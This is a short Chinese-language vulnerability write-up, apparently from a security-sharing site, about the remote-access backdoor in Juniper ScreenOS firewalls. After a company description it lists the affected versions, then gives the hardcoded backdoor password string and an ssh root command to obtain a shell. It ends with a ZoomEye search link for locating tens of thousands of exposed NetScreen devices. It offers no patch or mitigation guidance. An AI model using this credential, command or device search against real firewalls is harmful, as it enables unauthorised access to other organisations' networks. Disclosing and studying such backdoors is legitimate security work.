漏洞概要Juniper网络公司(中文名:瞻博网络)致力于实现网络商务模式的转型。作为全球领先的联网和安全性解决方案供应商,Juniper网络公司对依赖网络获得战略性收益的客户一直给予密切关注。公司的客户来自全球各行各业,包括主要的网络运营商、企业、政府机构以及研究和教育机构等。Juniper网络公司推出的一系列联网解决方案,提供所需的安全性和性能来支持全球最大型、最复杂、要求最严格的关键网络。
瞻博网络内部代码审计过程中发现了远程管理访问后门,可允许攻击者通过 SSH 或者 telnet 远程管理访问设备。影响ScreenOS 6.2.0r15—6.2.0r18,6.3.0r12—6.3.0r20版本。
漏洞详情
贡献者 Root 共获得 0KB
漏洞演示使用后门帐号密码登录
使用 root 帐号,配合后门密码 <<< %s(un='%s') = %u
ssh root@ip<<< %s(un='%s') = %u得到 SSH Shell
影响范围通过 ZoomEye 搜索:
https://www.zoomeye.org/search?q=NetScreen+sshd
可以搜索到有 47831 个 NetScreen 防火墙设备。